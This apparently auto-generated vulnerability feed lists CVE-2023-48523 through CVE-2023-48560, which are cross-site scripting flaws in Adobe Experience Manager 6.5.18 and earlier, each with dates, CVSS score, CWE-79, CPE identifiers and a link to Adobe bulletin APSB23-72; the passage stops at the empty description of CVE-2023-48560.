First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:26:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48523
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48524

First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:26:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48524
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48525

First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:28:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48525
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48526

First published on : 15-12-2023 11:15:27
Last modified on : 18-12-2023 20:28:48

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48526
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48527

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:28:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48527
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48528

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48528
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48529

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48529
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48530

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48530
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48531

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48531
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48532

First published on : 15-12-2023 11:15:28
Last modified on : 18-12-2023 20:29:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48532
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48533

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:30:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48533
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48534

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48534
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48535

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48535
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48536

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:19

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48536
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48537

First published on : 15-12-2023 11:15:29
Last modified on : 18-12-2023 20:36:13

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48537
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48538

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:36:06

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48538
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48539

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:35:58

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48539
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48540

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:35:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48540
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48541

First published on : 15-12-2023 11:15:30
Last modified on : 18-12-2023 20:35:43

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48541
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48542

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:35:30

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48542
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48543

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:35:22

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48543
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48544

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:35:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48544
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48545

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:34:54

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48545
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48546

First published on : 15-12-2023 11:15:31
Last modified on : 18-12-2023 20:34:48

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48546
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48547

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:38

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48547
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48548

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48548
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48549

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:23

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48549
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48550

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48550
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48551

First published on : 15-12-2023 11:15:32
Last modified on : 18-12-2023 20:34:05

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48551
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48552

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:31:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48552
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48553

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:31:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48553
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48554

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:32:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48554
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48555

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:32:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48555
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48556

First published on : 15-12-2023 11:15:33
Last modified on : 18-12-2023 20:32:24

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48556
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48557

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:11:54

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48557
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48558

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:12:01

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48558
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48559

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:41:10

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48559
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48560

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:41:04

Description :
